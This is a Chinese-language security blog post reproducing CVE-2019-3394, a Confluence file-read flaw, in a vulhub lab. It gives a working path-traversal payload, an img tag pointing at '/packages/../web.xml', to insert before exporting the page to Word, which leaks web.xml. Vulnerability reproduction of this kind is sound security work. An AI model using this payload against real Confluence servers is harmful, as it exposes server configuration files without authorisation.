前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2019-3394:Confluence 文件读取漏洞复现

CVE-2019-3394:Confluence 文件读取漏洞复现

作者头像
Timeline Sec
发布2019-12-15 12:02:38
1.4K0
发布2019-12-15 12:02:38
举报
文章被收录于专栏:Timeline SecTimeline Sec

0x00 前言


最近confluence又爆新漏洞,自己又比较忙,于是找了朋友C1893复现投稿,如有其他小伙伴想要练习漏洞复现,也可以加入我们哈

0x01 影响范围


6.1.0 <= version < 6.6.16

6.7.0 <= version < 6.13.7

6.14.0 <= version < 6.15.8

0x02 环境搭建


温馨提示:环境搭建要使用4G或以上运存的虚拟机/VPS搭建

这里使用之前CVE-2019-3396的漏洞环境,按照链接中的步骤搭建即可

代码语言:javascript
复制
https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396

环境启动过程中出现了点小问题

经百度查找后得到解决方案:

# 进入backports模块路径

代码语言:javascript
复制
cd /usr/local/lib/python2.7/dist-packages

# 复制整个包到transport包路径下

代码语言:javascript
复制
cp -r backports /usr/local/lib/python2.7/dist-packages/docker/transport

0x03 漏洞利用


创建页面填好信息后,确认创建处抓包

修改编辑文本的内容如下:

代码语言:javascript
复制
<p><img class=\"confluence-embedded-image\" src=\"/packages/../web.xml\" /></p>

导出为word处抓包

在返回包中即可看到web.xml文件内容

条件限制:此漏洞无法跳出web目录去读其他目录的文件

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-09-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档